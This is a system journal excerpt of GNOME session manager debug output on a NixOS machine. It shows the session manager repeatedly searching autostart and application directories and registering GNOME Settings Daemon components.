machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App5 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App6 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App5 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App7 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
